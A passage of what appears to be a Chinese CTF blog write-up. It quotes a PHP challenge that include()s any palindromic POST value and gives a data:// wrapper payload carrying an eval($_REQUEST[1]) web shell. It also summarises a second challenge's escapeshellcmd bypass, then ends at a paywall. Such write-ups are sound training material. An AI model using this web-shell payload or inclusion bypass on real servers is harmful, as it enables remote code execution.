pass-01 web签到
<?php
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2022-03-19 12:10:55
# @Last Modified by: h1xa
# @Last Modified time: 2022-03-19 13:27:18
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
error_reporting(0);
highlight_file(__FILE__);
$file = $_POST['file'];
if(isset($file)){
if(strrev($file)==$file){
include $file;
}
}
看到入参file 判断项是 strrev(反转)==正常入参
刚开始考虑过弱等于绕过,但是include没啥用,
后来了解到 2个知识点,,
1.第一可以利用 data://伪协议,
2.php ?>后的内容不再进行运算
所以可以构造如下:
file=data://text/plain,<?php eval($_REQUEST[1]);?>

通过py反转构造完整payload
PHP安全漏洞与绕过技巧

本文探讨了两道PHP安全题目,涉及strrev函数的等价比较和escapeshellcmd函数的过滤限制。在签到题pass-01中,通过data://伪协议和PHP注释语法构造payload绕过;在pass-02中,利用sed命令删除escapeshell限制并替换shell_exec为system。这些技巧展示了PHP安全防护的潜在弱点。
最低0.47元/天 解锁文章
3898

被折叠的 条评论
为什么被折叠?



